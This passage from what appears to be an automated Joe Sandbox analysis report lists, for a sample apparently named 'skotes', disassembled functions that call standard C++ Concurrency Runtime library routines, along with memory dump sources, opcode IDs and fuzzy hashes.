                                                                                                                                                • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                                                                                                                                              • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
                                                                                                                                              • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 0042DC56
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1091748018-0
                                                                                                                                              • Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                                                                                                                                              • Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
                                                                                                                                              • Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                                                                                                                                              • Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9
                                                                                                                                              APIs
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 004256F2
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00425726
                                                                                                                                              • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0042578B
                                                                                                                                              • SafeRWList.LIBCONCRT ref: 0042579A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 893951542-0
                                                                                                                                              • Opcode ID: a96c0715c63f9ea40c30877f16458aff8a3b90ae0bdce9f16fa17b481edfa4e9
                                                                                                                                              • Instruction ID: 2ace6f4a40c08d74c4d6c1ca825f031ea8b8404ac3105886002eae4958e0fc28
                                                                                                                                              • Opcode Fuzzy Hash: a96c0715c63f9ea40c30877f16458aff8a3b90ae0bdce9f16fa17b481edfa4e9
                                                                                                                                              • Instruction Fuzzy Hash: CC314836B406209FCF059F20D881EAE77A6AFC8714F5441BEE9099B395DF34AC048794
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3433162309-0
                                                                                                                                              • Opcode ID: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
                                                                                                                                              • Instruction ID: d418521b68a385beeb000fecb389156560c70f9a2eedc7cbe4bb4063ba4b2acd
                                                                                                                                              • Opcode Fuzzy Hash: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
                                                                                                                                              • Instruction Fuzzy Hash: 56318835A00319EFCF10DF94DA80BAE7BB9BF44304F5000AAD901AB346D7B4A905CBA5
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 004313FC
                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00431447
                                                                                                                                              • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0043147A
                                                                                                                                              • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0043152A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2092016602-0
                                                                                                                                              • Opcode ID: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
                                                                                                                                              • Instruction ID: 2c1c6394bad657f7c7461a769e5481a7fca310a92004f219b2be54b756da1658
                                                                                                                                              • Opcode Fuzzy Hash: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
                                                                                                                                              • Instruction Fuzzy Hash: C431A3B1E006159BCF04DFA9C4919EEFBB1BF48714F54922EE416A7391CB38AD41CB98
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                              • Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00429C9C
                                                                                                                                              • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429CE8
                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00429CFE
                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00429D6A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2033596534-0
                                                                                                                                              • Opcode ID: d5acf91e69b33f76441d518a4b4449b03275e723d49f236a958158d73a3ed043
                                                                                                                                              • Instruction ID: e4f0000fdf8db68e5cd6af660122ebbf79e84cae44bb9f1680ea774d3ebdc29a
                                                                                                                                              • Opcode Fuzzy Hash: d5acf91e69b33f76441d518a4b4449b03275e723d49f236a958158d73a3ed043
                                                                                                                                              • Instruction Fuzzy Hash: 7F21C471A001249FCB04EF65E4829DEB7B0AF05314FA0406BF401AB2A2DB396D45DB69
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069
                                                                                                                                                • Part of subcall function 0042B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B5AF
                                                                                                                                              • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F
                                                                                                                                              • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB
                                                                                                                                                • Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77
                                                                                                                                              • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 932774601-0
                                                                                                                                              • Opcode ID: 386fd577828921938e71a6797082d4329d7b43a5143f3f4dd254a7469bd44dd8
                                                                                                                                              • Instruction ID: aee70dd77bb51db2fd3432b00035324ccbacf7c2396e796ad22a8847a71e431e
                                                                                                                                              • Opcode Fuzzy Hash: 386fd577828921938e71a6797082d4329d7b43a5143f3f4dd254a7469bd44dd8
                                                                                                                                              • Instruction Fuzzy Hash: 8921F131600B249FCB24EF66E9908ABF3F5FF48304740455EE942A7651CB38F805CB9A
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 00424893
                                                                                                                                              • ListArray.LIBCONCRT ref: 004248A5
                                                                                                                                                • Part of subcall function 00425555: _InternalDeleteHelper.LIBCONCRT ref: 00425564
                                                                                                                                              • ListArray.LIBCONCRT ref: 004248AF
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 004248C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                              • Instruction ID: 31b515508320260662f635ad5702785156399e0e1222be57475953528d61ef06
                                                                                                                                              • Opcode Fuzzy Hash: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                              • Instruction Fuzzy Hash: 56012671700531BFCA15BB66E882E6EB72AFF84714740002FF40497612CB28FC6197A8
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE6A
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE7C
                                                                                                                                                • Part of subcall function 0042EF29: _InternalDeleteHelper.LIBCONCRT ref: 0042EF3B
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042EE86
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 0042EE9F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                              • Instruction ID: 01845a4d8ec283163aadd0492ce9737526dbd67995a3e91ebe677bd62b2db9fe
                                                                                                                                              • Opcode Fuzzy Hash: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                              • Instruction Fuzzy Hash: 7201A271700531BBCA25AB63E9C2D6EBB6ABF44714742002FF90597612CB28FC519698
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0C5
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0D7
                                                                                                                                                • Part of subcall function 0042C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0042C6C4
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D0E1
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 0042D0FA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                              • Opcode ID: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                              • Instruction ID: 755cb4a1e33a7fa83f33ee211f636d05fdd22ef1d8b5f684706db2c999db012a
                                                                                                                                              • Opcode Fuzzy Hash: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                              • Instruction Fuzzy Hash: 5E01F971B00531BFCA25BB62D8C2E7EB76ABF44718740442FF80097611CF28EC619798
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
                                                                                                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 78362717-0
                                                                                                                                              • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                              • Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
                                                                                                                                              • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                              • Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519
                                                                                                                                                • Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486
                                                                                                                                              • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
                                                                                                                                              • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 218105897-0
                                                                                                                                              • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                              • Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
                                                                                                                                              • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
